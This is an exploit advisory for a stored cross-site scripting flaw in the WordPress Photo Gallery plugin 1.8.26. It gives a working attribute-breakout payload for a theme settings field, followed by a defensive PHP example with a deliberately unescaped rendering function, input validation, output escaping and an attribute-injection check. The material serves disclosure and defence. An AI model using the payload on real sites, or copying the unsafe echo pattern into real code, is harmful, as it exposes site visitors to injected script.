WordPress Photo Gallery 1.8.26 Cross Site Scripting

2024.07.10
Credit: tmrswrr
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: WordPress Photo Gallery Version 1.8.26 Stored XSS
# Date: 2024-07-03
# Exploit Author: tmrswrr
# Category: Webapps
# Vendor Homepage: https://10web.io/plugins/wordpress-photo-gallery/
# Version 1.8.26

### Steps to Execute the Payload:

1. Click Photo Gallery > Themes > Edit Themes > https://127.0.0.1/wp-admin/admin.php?page=themes_bwg&task=edit&current_id=2
2. In the "Distance between pictures" field, place your payload: `"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"qq9r3`
3. Click Update
4. You will see the payload executed
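
The payload above works by closing a double-quoted HTML attribute, so the fix has two layers: accept only an integer for a distance setting, and escape the value for the attribute context on output. The following is an added example, not code from the plugin or the advisory author; the function names, the `image_margin` field name, the numeric bounds and the unescaped-echo pattern are assumptions. In WordPress code, `absint()` and `esc_attr()` play the roles of the plain-PHP calls used here.

```php
<?php
// Added example, not the plugin's code; function and field names are hypothetical.
// Payload string quoted in the advisory, used here as constructed test input.
$payload = '"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"qq9r3';

// Assumed vulnerable pattern: the stored option is echoed into a quoted attribute as-is.
function render_unsafe(string $distance): string {
    return '<input type="text" name="image_margin" value="' . $distance . '">';
}

// Input control: a pixel distance is a bounded non-negative integer (bounds are assumed).
function sanitize_distance($raw, int $default = 4): int {
    $n = filter_var($raw, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0, 'max_range' => 1000]]);
    return $n === false ? $default : $n;
}

// Output control: escape for the attribute context, independent of what was stored.
function render_safe(string $distance): string {
    $escaped = htmlspecialchars($distance, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="image_margin" value="' . $escaped . '">';
}

// Returns attribute names on the parsed <input> that the template did not write.
function unexpected_attributes(string $html): array {
    libxml_use_internal_errors(true);          // malformed markup is expected here
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    $extra = [];
    foreach ($doc->getElementsByTagName('input') as $input) {
        foreach ($input->attributes as $attr) {
            if (!in_array($attr->nodeName, ['type', 'name', 'value'], true)) {
                $extra[] = $attr->nodeName;
            }
        }
    }
    libxml_clear_errors();
    return $extra;
}

foreach ([
    'raw value, unescaped'    => render_unsafe($payload),
    'raw value, escaped'      => render_safe($payload),
    'validated, then escaped' => render_safe((string) sanitize_distance($payload)),
] as $label => $html) {
    $extra = unexpected_attributes($html);
    printf("%-24s %s\n", $label, $extra ? 'extra attributes: ' . implode(', ', $extra) : 'no extra attributes');
}
```

The same `unexpected_attributes()` check can be pointed at rendered admin or gallery markup in a regression test to confirm that a stored theme value never contributes attributes of its own.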

